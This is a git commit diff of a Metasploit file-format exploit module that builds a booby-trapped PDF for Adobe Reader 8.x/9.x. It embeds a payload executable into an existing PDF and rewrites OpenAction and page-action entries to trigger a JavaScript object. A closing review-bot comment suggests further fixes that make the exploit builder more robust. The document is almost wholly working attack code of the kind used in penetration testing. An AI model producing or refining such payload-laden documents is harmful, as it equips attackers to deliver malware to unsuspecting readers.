Fixes #472. This module still needs a lot of work, but this solves this particular bug, which was caused by unsetting the variable.

git-svn-id: file:///home/svn/framework3/trunk@7396 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-11-06 21:16:56 +00:00
parent 0fe06c614f
commit 1d5f1e5f69
1 changed files with 61 additions and 61 deletions


@ -2,7 +2,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::PDF_Parse
include Msf::Exploit::FILEFORMAT
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' => [ 'Colin Ames <amesc[at]attackresearch.com>' ],
'Payload' =>
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
@ -28,21 +28,21 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English)', { 'Ret' => '' } ]
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('INFILENAME', [ false, 'The Input PDF filename.', 'msf.pdf']),
OptString.new('EXENAME', [ false, 'The Name of payload exe.', '']),
OptString.new('INFILENAME', [ true, 'The Input PDF filename.']),
OptString.new('EXENAME', [ false, 'The Name of payload exe.']),
OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location to output the file.', './data/exploits/']),
], self.class)
end
def exploit
file_name = datastore['INFILENAME']
exe_name = datastore['EXENAME']
print_status("Reading in '#{file_name}'...")
stream = read_pdf()
print_status("Parsing '#{file_name}'...")
@ -53,19 +53,19 @@ class Metasploit3 < Msf::Exploit::Remote
startxrefs = pdf_objects[2]
root_obj = pdf_objects[3]
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(output)
end
def ef_payload(pdf_name,payload_exe,obj_num)
if payload_exe.empty?
if !(payload_exe and payload_exe.length > 0)
print_status("Using '#{datastore['PAYLOAD']}' as payload...")
payload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
file_size = payload_exe.length
stream = Rex::Text.zlib_deflate(payload_exe)
@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote
file_size = File.size(payload_exe)
stream = Rex::Text.zlib_deflate(IO.read(payload_exe))
md5 = Rex::Text.md5(File.read(payload_exe))
end
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
def js_payload(pdf_name,obj_num)
output = String.new()
@ -101,20 +101,20 @@ class Metasploit3 < Msf::Exploit::Remote
def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxref)
file_name = file_name.split(/\//).pop.to_s
match = file_name.match(/(.+)\.pdf/)
if match
pdf_name = match[1]
end
catalog = parse_object(xref_trailers,root_obj,stream)
match = catalog.match(/Names (\d+ \d) R/m)
if match
names = parse_object(xref_trailers,match[1],stream)
match = names.match(/EmbeddedFiles (\d+ \d) R/m)
if match
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
match = catalog.match(/OpenAction (\d+ \d) R/m)
if match
open_action = "#{match[1]} R"
if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
new_catalog = catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
end
end
else
else
if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end
else
if new_embedded_files
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -184,23 +184,23 @@ class Metasploit3 < Msf::Exploit::Remote
pages_obj = catalog.match(/Pages (\d+ \d) R/m)[1]
pages = parse_object(xref_trailers,pages_obj,stream)
page_obj = pages.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)[1]
page = parse_object(xref_trailers,page_obj,stream)
match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
while match
page_obj = match[1]
page = parse_object(xref_trailers,page_obj,stream)
match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
end
match = page.match(/AA<<\/O (\d+ \d) R/m)
if match
aa = parse_object(xref_trailers,match[1],stream)
end
new_pdf = String.new()
xrefs = String.new()
@ -211,12 +211,12 @@ class Metasploit3 < Msf::Exploit::Remote
num = trailers[0].fetch("Size").to_i - 1
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 4
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d R(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 3} 0" + '\2')
else
@ -224,14 +224,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
new_pdf << new_embedded_files
xrefs << xref_create(new_pdf,(new_pdf.length - new_embedded_files.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -246,12 +246,12 @@ class Metasploit3 < Msf::Exploit::Remote
pdf_payload << "#{num} 0 obj\r<</Names[(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 5
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 4} 0" + '\2')
else
@ -259,14 +259,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
new_pdf << new_names
xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -274,8 +274,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
else
pdf_payload = String.new()
num = trailers[0].fetch("Size").to_i + 1
@ -283,23 +283,23 @@ class Metasploit3 < Msf::Exploit::Remote
pdf_payload << "#{num} 0 obj\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 6
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 5} 0" + '\2')
else
new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 5} 0 R>>" + '\1')
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -307,12 +307,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
end
return new_pdf
end
end
end
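Review bot: `basic_social_engineering_exploit` still leaves `pdf_name` nil when INFILENAME does not end in `.pdf` — the `if match` after `match = file_name.match(/(.+)\.pdf/)` has no else — and the new-side code later interpolates it into the Filespec and passes it to `Rex::Text.to_unicode(pdf_name,"utf-16be")`, which presumably fails the same way the fixed EXENAME case did; now that the option is marked required, `raise ArgumentError, "INFILENAME must be a .pdf file" unless match` followed by `pdf_name = match[1]` would make the requirement explicit. In `ef_payload` the operator-supplied EXENAME path is also read twice (`IO.read` for the deflated stream, `File.read` for the MD5) plus a separate `File.size` stat, so a file that changes between those calls yields a `/Size`, `/CheckSum` and stream that disagree; reading it once into a local and deriving all three from it avoids that. The nil-safe test `if !(payload_exe and payload_exe.length > 0)` reads more naturally as `if payload_exe.to_s.empty?`. `ef_payload` starts in the `@ -53,19` hunk and its file-read lines are in the following one.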